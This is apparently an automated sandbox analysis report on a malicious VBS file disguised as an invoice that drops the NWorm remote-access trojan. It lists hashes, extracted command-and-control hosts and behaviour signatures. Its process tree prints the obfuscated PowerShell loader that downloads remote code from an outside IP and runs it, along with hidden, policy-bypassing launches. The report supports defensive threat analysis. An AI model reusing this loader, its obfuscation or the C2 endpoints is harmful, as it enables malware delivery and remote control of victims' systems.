Analysis
-
max time kernel
139s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
23-02-2022 11:53
General
-
Target
GBTVHWQCB_INVOICE#07JDKAS.vbs
-
Size
4KB
-
MD5
d546eb292c17626af658e34ffa402e47
-
SHA1
f0a379ae37a860a6c082464f4a41cd474a5f4cbe
-
SHA256
adf6d30e5c3767c268a66aa887dff2ebe4d0295c49c9bc42d343b6dd0e707825
-
SHA512
e15402e69ca3e2391a63fec1a718524bc0841e49b0c954162696d96cd11c04d82a5daad52a5fafe1c9101922ab0cc3bd26892038d8ae4f6cd1c9220634b37048
Malware Config
Extracted
nworm
v0.3.8
nyanmoj.duckdns.org:5057
moneyhope81.duckdns.org:5057
cb2d3cba
Signatures
-
NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GBTVHWQCB_INVOICE#07JDKAS.vbs"1⤵
-
C:\Windows\system32\msHta.exemsHta.exe Http://3.145.46.6/K/EncKAO.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HCNPXUQJCLATJSNVPNHGASK = '[*4@!-95&[27011]{{<!4(}y*4@!-95&[27011]{{<!4(}t3{{!{39=335@-#%2^${![292#\&3/-4=3%^]+\@8_#2}.IO.*4@!-95&[27011]{{<!4(}t()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{92#\&3/-4=3%^]+\@8_#2}()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{d3{{!{39=335@-#%2^${![2()&/@+/6!@3=1*&#^285<5]'.Replace('*4@!-95&[27011]{{<!4(}','S').Replace('3{{!{39=335@-#%2^${![2','E').Replace('()&/@+/6!@3=1*&#^285<5','R').Replace('5_8%0=^\09<276{[=(-\-{','A').Replace('92#\&3/-4=3%^]+\@8_#2}','M');$HWBPFQSKIJPSNVWGRPDVWTQ = ($HCNPXUQJCLATJSNVPNHGASK -Join '')|&('I'+'EX');$HVVGCGZUOWJPPVKKFNXPRYX = '[-<@!(_!_@2#@@73#6#<*68y-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2/=+\6{8&8!=%9$&6%0#$!1m.N/=+\6{8&8!=%9$&6%0#$!134^%[/28$^_^1)_+%&$}{2.W/=+\6{8&8!=%9$&6%0#$!1bR/=+\6{8&8!=%9$&6%0#$!1qu/=+\6{8&8!=%9$&6%0#$!1-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2]'.Replace('-<@!(_!_@2#@@73#6#<*68','S').Replace('/=+\6{8&8!=%9$&6%0#$!1','E').Replace('34^%[/28$^_^1)_+%&$}{2','T');$HZSWCZCRBXDIWQKWTESQTIY = ($HVVGCGZUOWJPPVKKFNXPRYX -Join '')|&('I'+'EX');$HFJRRSZDESQZWRCXANLTRDS = '\=)9&+81%{23</-^[/=-[6r7-{)&9)1(!_(2]+86%-(=5a+8#6&}]%/5}-^]%]5<#$7+7-{)&9)1(!_(2]+86%-(=5'.Replace('\=)9&+81%{23</-^[/=-[6','C').Replace('7-{)&9)1(!_(2]+86%-(=5','E').Replace('+8#6&}]%/5}-^]%]5<#$7+','T');$HWCLNHXSDRQHGEGSDTPUANI = '$#][}(-9<9$33&7@-{54#^-0@}{9!{69/<}19_19+_5&tR-0@}{9!{69/<}19_19+_5&0$}\+-8(030\)(%<}^/736pon0$}\+-8(030\)(%<}^/736-0@}{9!{69/<}19_19+_5&'.Replace('$#][}(-9<9$33&7@-{54#^','G').Replace('-0@}{9!{69/<}19_19+_5&','E').Replace('0$}\+-8(030\)(%<}^/736','S');$HUNOTPOSFQRHVLUSSYXPQCA = 'G_]@_61$7+/%50=7%)5}$+*t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[pon43=743-[#=!81/<[(**(<[_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*am'.Replace('43=743-[#=!81/<[(**(<[','S').Replace('_]@_61$7+/%50=7%)5}$+*','E').Replace('(#(&<<]#_^68#}}%]-#61#','R');$HHGZUQOYZVBAZGKFOKONHQP = '{[)9)4\#-&640<2_1%000//30#)6832^&7)=]=!{%8-_a20&[#8=\]=4}\*/8^-5_^+To/30#)6832^&7)=]=!{%8-_n20&[#8=\]=4}\*/8^-5_^+'.Replace('{[)9)4\#-&640<2_1%000/','R').Replace('/30#)6832^&7)=]=!{%8-_','E').Replace('20&[#8=\]=4}\*/8^-5_^+','D');&('I'+'EX')($HWBPFQSKIJPSNVWGRPDVWTQ::new($HZSWCZCRBXDIWQKWTESQTIY::$HFJRRSZDESQZWRCXANLTRDS('HttP://3.145.46.6/K/ServerFAH.txt').$HWCLNHXSDRQHGEGSDTPUANI().$HUNOTPOSFQRHVLUSSYXPQCA()).$HHGZUQOYZVBAZGKFOKONHQP())2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.bat1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noe -nop -nonI -WIndoWSTYLe Hidden -executionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\WZQNBDSLVGAWPUXJRUVDYE.ps12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noe -nop -nonI -WIndoWSTYLe Hidden -executionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\WZQNBDSLVGAWPUXJRUVDYE.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1ca2d431085aeaf74a34fa288ee241ce
SHA1c2eee8833239a4f314c788974cd918458213d2cd
SHA2561b14dced54fee58bc9101ae0a0d99be3d8e5ec293937f25177acc12d1775d764
SHA51274cb10e76aa479a3076b9e35841cb75aea03bdd7b7a521961be10a403441d6f22c6641f7f92d00a59fc77c12829f4fe216e7fcb1e6aa6d2e2ff26376f55515ec
-
MD5
abbd84fe458a51e5e93dc62ba2a33313
SHA1df97c89da1a0eaac1485afb1210ffc034e458e65
SHA256197d956d33beac34ac8a9b79c460508d28e9069977a27712150695ad2fa8eb22
SHA5126acb1ba6d93aea7e6857f95a3ca7399050b384283f1c9fbf2bdd52e49d09e1aba8a44106621a07b5f01be55e3bf90e0d405a8485bfd396902e7dacba1da37af6
-
MD5
8fd7979dccc0170bfb3a586d28d572c8
SHA185873a74e36ec1f8e5c92a28492be96b7fc1afee
SHA2560bcec1d4172f5edf9956023c08752b93be00eee1d1dd7ee027e70bab737bfedf
SHA512c0e093348d0c15bdeed81bcec7ef66a080834edba3ab25d6405e68727d944ec0425b755d9f21a7d550b3ff17edb78e7ea9a2843df4f6c8d9d67a6a26ca713ec2
-
MD5
3fbbaee606b9fa5ed730aab0c6123ce0
SHA1a38435566b572cd77b2b5521cf50d830518ba9cf
SHA2562d89ba4be26780c15328677895a43b6b31791a25105892d562cacf7fc902299d
SHA5129cb3c6aa7021c09ec5c54520066fea23195e87c5cac41b2eba7bd8a0f31edc23414ebe4bbe3524ebcc2e100c3aec179987e58e11587205d4242302fa92b33f2f
-
Filesize
40KB
-
Filesize
408KB
-
Filesize
5.6MB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
104KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB